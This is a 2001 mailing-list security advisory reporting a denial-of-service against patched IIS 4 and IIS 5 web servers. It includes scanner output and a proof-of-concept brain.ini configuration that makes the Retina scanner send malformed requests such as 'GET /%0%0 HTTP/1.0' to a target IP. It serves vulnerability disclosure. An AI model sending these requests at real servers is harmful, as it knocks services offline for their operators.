Date: Sat, 13 Jan 2001 11:53:17 -0500
From: NtWaK0 <[email protected]>
To: [email protected]Subject: DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
NtWaK0, SecurHack. Labs
Security Advisory 1-13-2001
DOSSING IIS 4 or IIS5 fully patched using GET /%0%0 HTTP/1.0
______________________________________________________________________
oooooooooooooooooo
Vulnerable Systems
oooooooooooooooooo
IIS 4 and IIS 5 even if fully patched.
oooooooo
Synopsis
oooooooo
While playing with miner in retina I sent this GET /%0%0 HTTP/1.0 to one
of my
IIS 4 and IIS 5 servers, I noticed that retina is taking a lot of
time
to jump to the next defined variable in the brain.ini which should be GET
/%0%1
and so on.
Retina Result
ooooooooooooo
Command: GET /%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Command: GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060 Command:
GET /_vti_inf.html%0%0 HTTP/1.0
Notes:: Connection to server lost.
Error:: 10060
Pinging the box while running retina even from different subnet it wont
answer.
You can connect to the web but you have to wait forever for it to load.
I have tried that on IIS 4 and II 5 and same result ....
oooooooooooooooo
Proof-Of-Concept
oooooooooooooooo
1- Get Retina From eeye.com
2- Install it
3- Edit the file Brain.ini located
C:\Program Files\Retina 2.0\Modules\Retina\Miner\brain.ini <default
4- Put this in your brain.ini file
[General]
Title=HTTP Miner
[Commands]
1=GET /%%cgi-bin%%%%passwordfile%%%%passwordfile%% HTTP/1.0
[Variables]
cgi-bin=,
passwordpath=%0,%1,%2,%3,%4,%5,%6,%7,%8,%9,%a,%b,%c,%d,%e,%f,
5- Run retina and choose miner and type your IP GO :)
Btw that will start sending GET /%0%0 HTTP/1.0 GET /%0%1 HTTP/1.0 etc
To see the result open up your browser and point to the IP you are mining
and
you will notice you can just connect and your LAN in my case cable is
almost
flooded. Ping the IP you are mining and you will get a Ping time out.
Even if you try to connect to that IP from totally a different network you
wont
be able to view the page or it will take for-ever to load.
oooooooooo
Resolution
oooooooooo
No Idea :(
ooooooo
Credits
ooooooo
The discovery and documentation of this vulnerability was conducted by
NtWaK0.
For more information Dalnet channel #security
______________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.__________
Live Well Do Good |
Accept no limitations \(|)/
/`\ NtWaK0
